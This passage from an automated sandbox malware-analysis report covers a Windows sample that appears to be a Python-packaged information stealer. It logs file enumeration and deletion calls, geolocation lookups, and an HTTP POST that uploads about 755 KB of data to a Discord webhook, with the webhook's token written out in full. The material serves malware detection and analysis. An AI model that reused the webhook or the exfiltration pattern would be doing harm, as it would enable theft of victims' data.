              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: X9g8L63QGs.exe, 00000004.00000003.1270486310.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: X9g8L63QGs.exe, 00000007.00000002.1711557292.00007FFB0BEEA000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: ;C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.pdb source: powershell.exe, 00000046.00000002.1499829000.0000017515AF3000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000061.00000002.1609980700.00007FF708100000.00000002.00000001.01000000.0000001F.sdmp, rar.exe, 00000061.00000000.1596460046.00007FF708100000.00000002.00000001.01000000.0000001F.sdmp, rar.exe.4.dr
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1716138569.00007FFB1D5B1000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1714746731.00007FFB1AB01000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: X9g8L63QGs.exe, 00000007.00000002.1714464196.00007FFB167AB000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1715936942.00007FFB1D341000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: ;C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.pdbhPa source: powershell.exe, 00000046.00000002.1499829000.0000017515AF3000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: X9g8L63QGs.exe, 00000007.00000002.1714464196.00007FFB167AB000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: X9g8L63QGs.exe, 00000007.00000002.1711177920.00007FFB0BA55000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.pdb source: powershell.exe, 00000046.00000002.1579982318.000001752C6A9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: X9g8L63QGs.exe, 00000007.00000002.1712634643.00007FFB0BFE1000.00000040.00000001.01000000.0000000F.sdmp
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26683B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF7C26683B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26692F0 FindFirstFileExW,FindClose,4_2_00007FF7C26692F0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 4_2_00007FF7C26818E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF7C26818E4
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26692F0 FindFirstFileExW,FindClose,7_2_00007FF7C26692F0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26683B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00007FF7C26683B0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FF7C26818E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,7_2_00007FF7C26818E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080B46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,97_2_00007FF7080B46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080AE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,97_2_00007FF7080AE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exeCode function: 97_2_00007FF7080F88E0 FindFirstFileExA,97_2_00007FF7080F88E0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\AppxSip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\en-GB\CRYPT32.dll.mui
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SYSTEM32\OpcServices.DLL
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\7488c4f196cfa60a4ca5cca24e2169b0\Microsoft.Management.Infrastructure.ni.dll
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
              Source: unknownDNS query: name: ip-api.com
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeCode function: 7_2_00007FFB1BA462B4 recv,7_2_00007FFB1BA462B4
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: blank-ivnd9.in
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: discord.com
              Source: unknownHTTP traffic detected: POST /api/webhooks/1315377405426270278/HIGwvC-Zpfa8Zkb7aEYPMg-EuYuZPz1LJEfXefQjcA8JYgb6wbSS5zj82QNtaz9Su_0D HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 755602User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=37a76d34b53131452d6fc832f167ffc7
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 05 Jan 2025 06:19:51 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1736057992x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hAXIq9XtArVKc%2Ffubs8AT0r1q2NMEWVkjfKCdI6jYKfc1azRAidxd4u3EbEtHoGK3aODxcAqyDIfPtP5tjiUcDJFBrKwLRcktghWLo%2B2qmX%2BB5kfWJsHE43k6je%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=14735b5a48e24b09b557091335c501751a43c2b5-1736057991; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=q.0E45z3pGSklbxiFMyXrHfDuxC.4JrCDgahg7Y.Fx0-1736057991326-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8fd15bea497fef9d-EWR
              Source: X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
              Source: X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.dr, _sqlite3.pyd.4.dr, select.pyd.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.dr, _sqlite3.pyd.4.dr, select.pyd.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691353377.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: X9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691353377.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1696653047.000001E7C3008000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1687315240.000001E7C2FDD000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1689257991.000001E7C3007000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1689148113.000001E7C2FF6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1514130016.0000024533D14000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1579165727.000001752C62F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: powershell.exe, 00000014.00000002.1522920960.000002453402D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
              Source: powershell.exe, 00000014.00000002.1522920960.000002453402D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
              Source: X9g8L63QGs.exe, 00000004.00000002.1720049067.000001FB29ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: powershell.exe, 00000014.00000002.1514130016.0000024533D14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EED000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.dr, _sqlite3.pyd.4.dr, select.pyd.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: X9g8L63QGs.exe, 00000004.00000003.1271192844.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271975755.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271403967.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275978530.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273821737.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1274105717.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273728982.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1273315445.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271270845.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1276344196.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270860753.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270706843.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1270624594.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271008823.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1275806701.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000004.00000003.1271079647.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.4.dr, _ssl.pyd.4.dr, libcrypto-3.dll.4.dr, _sqlite3.pyd.4.dr, select.pyd.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: _ctypes.pyd.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
